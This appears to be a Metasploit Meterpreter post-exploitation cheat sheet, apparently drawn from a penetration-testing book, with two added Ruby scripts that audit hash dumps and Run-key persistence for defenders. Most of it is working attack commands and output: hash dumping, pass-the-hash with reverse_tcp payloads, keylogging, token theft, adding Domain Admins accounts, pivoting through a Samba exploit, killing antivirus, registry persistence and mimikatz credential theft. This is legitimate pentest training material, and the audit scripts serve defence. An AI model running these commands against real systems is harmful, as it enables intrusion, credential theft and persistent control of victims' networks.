Meterpreter

Extracting the Password Hashes

Running as SYSTEM.

meterpreter > use priv
Loading extension priv...success.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29:::

The LM half, aad3b435b51404eeaad3b435b51404ee, is a standard placeholder: the user's password is longer than 14 characters, so LM cannot store a hash of it.
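An added example (not from the book or from Metasploit) that parses hashdump lines in this user:rid:lm:nt::: format and flags the two things worth acting on: accounts whose LM hash is actually stored, and accounts whose NT hash is that of an empty password. The input is the line above, the Administrator line from the later hashdump listing, and a constructed Guest line.

```ruby
# LM hash of the empty string: what hashdump prints when no LM hash is stored
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string: the account has a blank password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input: the two Administrator lines from the listings on this page
# plus a constructed Guest line with a blank password.
HASHDUMP_LINES = <<~DUMP
  [*] Dumping password hashes...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29:::
  Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DUMP

# Parse one pwdump-format line "user:rid:lm:nt:::"; returns nil for anything
# else, so hashdump's status lines can be fed in unfiltered.
def parse_hashdump_line(line)
  m = line.strip.match(/\A([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\z/i)
  return nil unless m
  {
    user: m[1],
    rid: m[2].to_i,
    lm_stored: m[3].downcase != EMPTY_LM,     # a real LM hash cracks in hours
    blank_password: m[4].downcase == EMPTY_NT,
  }
end

# Audit a whole dump and keep only the accounts a defender must act on.
def audit_hashdump(text)
  text.each_line.filter_map { |l| parse_hashdump_line(l) }
      .select { |a| a[:lm_stored] || a[:blank_password] }
end

if __FILE__ == $PROGRAM_NAME
  audit_hashdump(HASHDUMP_LINES).each do |a|
    issues = []
    issues << "LM hash stored (enable NoLMHash or use passwords over 14 chars)" if a[:lm_stored]
    issues << "blank password" if a[:blank_password]
    puts "#{a[:user]} (RID #{a[:rid]}): #{issues.join(', ')}"
  end
end
```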

Pass the Hash

Prerequisites: you have the user's hash, the SMB service is running on the target, and the user has write permission on at least one SMB share.

msf> use windows/smb/psexec
msf exploit(psexec)> set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec)> set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(psexec)> set LPORT 443
LPORT => 443
msf exploit(psexec)> set RHOST 192.168.33.130
RHOST => 192.168.33.130
. . . SNIP . . .
msf exploit(psexec)> set SMBPass aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29
SMBPass => aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29
msf exploit(psexec)> exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...

Capturing Key Strokes

meterpreter > ps
Process list
============
 PID Name Arch Session User Path
 --- ---- ---- ------- ---- ----
 0 [System Process]
 4 System x86 0 NT AUTHORITY\SYSTEM
 1476 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
 1668 explorer.exe x86 0 IHAZSECURITY\Administrator C:\WINDOWS\Explorer.EXE
. . . SNIP . . .
meterpreter > migrate 1668
[*] Migrating to 1668...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/loot/20110324171334_default_192.168.1.195_host.windows.key_179703.txt
[*] Recording keystrokes...
[*] Saving last few keystrokes...

Token Impersonation

meterpreter > ps
Process list
============
 PID Name Arch Session User Path
 --- ---- ---- ------- ---- ----
 0 [System Process]
 4 System x86 0 NT AUTHORITY\SYSTEM
 380 cmd.exe x86 0 SNEAKS.IN\ihazdomainadmin \SystemRoot\System32\cmd.exe
meterpreter > steal_token 380
Stolen token with username: SNEAKS.IN\ihazdomainadmin
meterpreter >

# or
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
 Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
SNEAKS.IN\ihazdomainadmin
IHAZSECURITY\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > impersonate_token SNEAKS.IN\\ihazdomainadmin
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\ihazdomainadmin
meterpreter > add_user omgcompromised p@55w0rd! -h 192.168.33.50
[*] Attempting to add user omgcompromised to host 192.168.33.50
[+] Successfully added user
meterpreter > add_group_user "Domain Admins" omgcompromised -h 192.168.33.50
[*] Attempting to add user omgcompromised to group Domain Admins on domain controller 192.168.33.50
[+] Successfully added user to group

Pivoting Through Sub-network

# use the scanner/portscan/tcp module (from the msf prompt, once the route below exists) to port scan the subnet through the compromised target
msf > use auxiliary/scanner/portscan/tcp

# add route to the subnet
meterpreter > run get_local_subnets
Local subnet: 192.168.33.0/255.255.255.0
meterpreter > background
msf exploit(handler) > route add 192.168.33.0 255.255.255.0 1
msf exploit(handler) > route print
Active Routing Table
====================
 Subnet Netmask Gateway
 ------ ------- -------
 192.168.33.0 255.255.255.0 Session 1

# exploit the target in the subnet
msf exploit(handler) > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(lsa_transnames_heap) > set LHOST 10.10.1.129
LHOST => 10.10.1.129
msf exploit(lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) > set RHOST 192.168.33.132
RHOST => 192.168.33.132
msf exploit(lsa_transnames_heap) > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:47:e6:79
 inet addr:10.10.1.129 Bcast:10.10.1.255 Mask:255.255.255.0
 inet6 addr: fe80::20c:29ff:fe47:e679/64 Scope:Link
 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
 RX packets:23656 errors:0 dropped:0 overruns:0 frame:0
 TX packets:32321 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:4272582 (4.2 MB) TX bytes:17849775 (17.8 MB)
 Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
 inet addr:127.0.0.1 Mask:255.0.0.0
 inet6 addr: ::1/128 Scope:Host
 UP LOOPBACK RUNNING MTU:16436 Metric:1
 RX packets:600 errors:0 dropped:0 overruns:0 frame:0
 TX packets:600 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:0
 RX bytes:41386 (41.3 KB) TX bytes:41386 (41.3 KB)
msf exploit(lsa_transnames_heap) > exploit
[*] Started reverse handler on 10.10.1.129:8080
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe411...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe412...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (10.10.1.129:8080 -> 192.168.33.132:1608)

# or load the auto_add_route plugin, which adds the route automatically when a session opens
msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route

# a route can also be added from a session with: run autoroute -s <cidr>
# check the result with: run autoroute -p

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.10.1.129:443
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (10.10.1.129:443 -> 192.168.33.130:1090)
[*] AutoAddRoute: Routing new subnet 192.168.33.0/255.255.255.0 through session 1

Meterpreter Scripts

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.33.129 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 37888 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\CTDWtQC.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.33.129:4545...
[*] VNC Server session 2 opened (192.168.33.129:4545 -> 192.168.33.130:1091)
meterpreter > run screen_unlock
[*] OS 'Windows XP (Build 2600, Service Pack 2).' found in known targets
[*] patching...
[*] done!

Migrating to a Process

meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: revterp.exe (2436)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)

Killing Antivirus Software

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
[*] Killing off cmd.exe...

Obtaining System Password Hashes

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY de4b35306c5f595438a2f78f768772d2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::

Viewing All Traffic on a Target Machine

meterpreter > run packetrecorder -i 1
[*] Starting Packet capture on interface 1
[*] Packet capture started

Scraping a System

meterpreter > run scraper
[*] New session on 192.168.33.130:1095...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\WINDOWS\TEMP\XklepHOU.reg)

Using Persistence

Meterpreter’s persistence script allows you to inject a Meterpreter agent to ensure that Meterpreter is running even after the target system reboots. If this is a reverse connection, you can set intervals for the target to connect back to the attacker machine. If it’s a bind, you can have it attempt to bind on an interface at a given time.

As of this writing, the only way to remove the Meterpreter agent is to delete the registry entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ and remove the VBScript located in C:\WINDOWS\TEMP. Be sure to document the registry keys and locations (such as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc) so you can remove them manually. Generally, you can do this through Meterpreter or drop to a shell and remove it that way. If you feel more comfortable using a GUI, you can use run vnc and remove the script with regedit. (Note that the registry value name changes each time, so make sure that you document where Metasploit adds the registry keys.)

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.33.129
[*] Creating a persistent agent: LHOST=192.168.33.129 LPORT=443 (interval=50 onboot=true)
[*] Persistent agent script is 316384 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs
[*] Agent executed with PID 3160
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc
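An added example (not from the book or from Metasploit) of how a defender could audit the Run key for the kind of entry the persistence script installs: it parses the output of reg query for that key (the sample is constructed from the value name and .vbs path in the listing above plus a benign entry) and lists the registry value and the script file to remove.

```ruby
# Registry key that the persistence script writes its autorun value to.
RUN_KEY = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'

# Constructed "reg query" output for that key: one legitimate entry and
# the value name / .vbs path shown in the persistence listing above.
REG_QUERY_OUTPUT = <<~'REG'
  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
      VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
      xEYnaHedooc    REG_SZ    C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs
REG

SCRIPT_EXTS = %w[.vbs .vbe .js .jse .wsf .bat .cmd .ps1 .hta].freeze

# Parse "name  REG_TYPE  data" lines; the key header line is skipped.
def parse_run_values(text)
  text.each_line.filter_map do |line|
    m = line.match(/\A\s+(.+?)\s{2,}(REG_\w+)\s{2,}(.*?)\s*\z/)
    m && { name: m[1], type: m[2], data: m[3] }
  end
end

# First token of the command line (quoted or not): the file that gets launched.
def launched_file(data)
  data = data.strip
  data.start_with?('"') ? data[/\A"([^"]*)"/, 1] : data.split(/\s+/).first.to_s
end

# Why an entry deserves a look: a script rather than a program, or a file
# under a TEMP directory, which is where the persistence agent is dropped.
def suspicious_reasons(data)
  target = launched_file(data)
  ext = File.extname(target.split(/[\\\/]/).last.to_s).downcase
  reasons = []
  reasons << "script file (#{ext})" if SCRIPT_EXTS.include?(ext)
  reasons << "runs from a TEMP directory" if target =~ /\\temp\\/i
  reasons
end

# Entries to clean up: the registry value to delete and the file on disk to
# remove, mirroring the manual removal steps described above.
def audit_run_key(text)
  parse_run_values(text).filter_map do |v|
    why = suspicious_reasons(v[:data])
    why.empty? ? nil : { value: "#{RUN_KEY}\\#{v[:name]}", file: launched_file(v[:data]), reasons: why }
  end
end
```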

msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 2 opened (192.168.33.129:443 -> 192.168.33.130:1120)

Leveraging Post Exploitation Modules

meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY de4b35306c5f595438a2f78f768772d2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Upgrading Your Command Shell to Meterpreter

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > setg LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) > setg LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > exploit -z
[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1032)
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -u 1
[*] Started reverse handler on 192.168.33.129:8080
[*] Starting the payload handler...
[*] Command Stager progress - 3.16% done (1694/53587 bytes)
[*] Command Stager progress - 6.32% done (3388/53587 bytes)
. . . SNIP . . .
[*] Command Stager progress - 97.99% done (52510/53587 bytes)
[*] Sending stage (748032 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.33.129:8080 -> 192.168.33.130:1044)
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >

Manipulating Windows APIs with the Railgun Add-On

You can call the Windows native API directly through a Metasploit add-on called Railgun, written by Patrick HVE. With Railgun loaded, Meterpreter can invoke Windows API functions natively. In the following listing we drop into the interactive Ruby shell (irb) available through Meterpreter, which lets us work with the Meterpreter client using Ruby syntax; from there we call Railgun to create a simple pop-up box saying "hello world".

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")

Other Useful Commands

ps

migrate

getsystem

run bypassuac

load kiwi

creds_kerberos | creds_wdigest (kiwi names; the older mimikatz extension called these kerberos and wdigest)

net group "Domain Admins" /domain (lists all Domain Admins in the domain)

qwinsta (lists user session information)

# Create an additional administrative account on all hosts
net user username password /ADD /DOMAIN

net group "Domain Admins" username /ADD /DOMAIN

net localgroup Administrators username /ADD

screenshot

sysinfo

rev2self